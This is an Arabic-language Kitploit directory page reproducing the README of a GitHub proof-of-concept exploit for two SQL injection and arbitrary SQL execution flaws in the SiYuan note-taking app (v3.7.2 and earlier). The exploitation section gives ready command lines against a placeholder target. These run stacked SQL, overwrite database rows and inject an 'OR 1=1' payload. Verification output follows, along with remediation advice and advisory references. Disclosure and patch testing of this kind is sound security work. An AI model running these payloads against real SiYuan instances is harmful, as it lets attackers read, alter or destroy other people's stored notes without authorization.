Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-69084-PoC — CVE-2026-69084/69085 — تنفيذ SQL تعسفي في SiYuan عبر searchEmbedBlock + searchDocs SQLi (CVSS 9.9). تم التحقق على v3.7.2، وتم الرفض على v3.7.3. | Kitploit
أدوات/GitHubGitHub/boreas37/cve-2026-69084-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubboreas37/cve-2026-69084-poc

CVE-2026-69084-PoC

CVE-2026-69084/69085 — تنفيذ SQL تعسفي في SiYuan عبر searchEmbedBlock + searchDocs SQLi (CVSS 9.9). تم التحقق على v3.7.2، وتم الرفض على v3.7.3.

عرض المستودع
11منذ 19 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-69084 / CVE-2026-69085 — تنفيذ SQL تعسفي وحقن SQL في SiYuan

CVE-2026-69084: تنفيذ SQL تعسفي عبر /api/search/searchEmbedBlock CVE-2026-69085: حقن SQL عبر /api/filetree/searchDocs CVSS 9.9 (حرج) لكل منهما · CWE-89 · SiYuan <= v3.7.2 (تم الإصلاح في v3.7.3) نُشر في 2026-08-03 · لا يوجد PoC عام وقت النشر

TL;DR

SiYuan (تطبيق تدوين الملاحظات مفتوح المصدر، github.com/siyuan-note/siyuan) يعرض نقطتي نهاية API تمرران SQL يتحكم فيه المهاجم إلى قاعدة بيانات SQLite الخاصة به:

CVE-2026-69084 — /api/search/searchEmbedBlock: يتم تمرير معامل stmt حرفيًا إلى مقبض قاعدة البيانات الرئيسي للقراءة والكتابة siyuan.db دون أي قيد على عبارة واحدة أو وضع القراءة فقط. يقوم مشغل SQLite بتنفيذ عبارات مكدسة (مفصولة بفواصل منقوطة)، لذا يمكن للمهاجم تنفيذ / / / / على أي شيء في قاعدة البيانات. محمي فقط بواسطة — يمكن الوصول إليه باستخدام رمز RoleReader للنشر، أو بشكل مجهول عندما يكون وضع النشر يحتوي على .

CREATE
INSERT
UPDATE
DELETE
DROP
CheckAuth
Publish.Auth.Enable=false

CVE-2026-69085 — /api/filetree/searchDocs: يتم دمج معامل keyword مباشرة في SQL دون تهريب أو ربط معاملات.

تم إصلاح كلاهما في v3.7.3 عبر sql.CheckSingleStatement() + sql.CheckReadonlyStatementInBox().

الاستغلال

root@kitploit:~
# 1. فحص غير مدمر (sqlite_version)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --check

# 2. إثبات الكتابة في قاعدة البيانات: CREATE TABLE + INSERT
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --proof

# 3. تنفيذ SQL تعسفي (يدعم العبارات المكدسة)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "SELECT * FROM blocks LIMIT 5"
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "UPDATE blocks SET hpath='PWNED' WHERE id=(SELECT id FROM blocks LIMIT 1)"

# 4. حقن SQL في searchDocs (69085)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --searchdocs "x' OR 1=1 --"

إذا كانت النسخة تعمل مع تمكين وضع النشر وتعطيل المصادقة (Publish.Auth.Enable=false)، فلن تكون هناك حاجة إلى --auth على الإطلاق.

التحقق (SiYuan حقيقي v3.7.2 في Docker)

root@kitploit:~
$ python3 CVE-2026-69084.py http://127.0.0.1:6806 --auth test123 --proof
[*] SQL: CREATE TABLE IF NOT EXISTS pwn_69084 (id INTEGER)
[+] SQL accepted (blocks: 0)
[*] SQL: INSERT INTO pwn_69084 VALUES (31337)
[+] SQL accepted (blocks: 0)
[+] DB-WRITE PROOF COMPLETE — pwn_69084 table + 31337 row in siyuan.db

# على المضيف:
$ sqlite3 siyuan.db "SELECT * FROM pwn_69084;"
31337

الإصدار المُصحح v3.7.3 يرفض نفس الطلبات:

  • SELECT 1; CREATE TABLE x → "SQL statement is not single"
  • UPDATE blocks ... → "SQL statement is not a read-only query"
  • SELECT المفردة لا تزال تعمل (الوظيفة المشروعة محفوظة)

تفاصيل PoC الداخلية

يقوم PoC بلغة Python بتسجيل الدخول عبر الجلسة (/api/system/loginAuth) للحصول على ملف تعريف الارتباط للمصادقة، ثم يرسل POST إلى نقطة النهاية الضعيفة. تم اختباره ضد b3log/siyuan:v3.7.2 (الضعيف) و b3log/siyuan:v3.7.3 (المُصحح).

المعالجة

  • قم بترقية SiYuan إلى v3.7.3 أو أحدث.
  • إذا كنت تعرض وضع النشر في SiYuan، فاحتفظ بـ Publish.Auth.Enable=true واستخدم رموز RoleReader قوية.

المراجع

  • GHSA-p2x7-4c4p-8wh6 (69084)
  • GHSA-5w4j-hchp-r332 (69085)
  • NVD — CVE-2026-69084
  • NVD — CVE-2026-69085
  • VulnCheck advisory

إخلاء المسؤولية

لأغراض الاختبار الأمني المصرح به والتعليم فقط.

تنزيل الأداة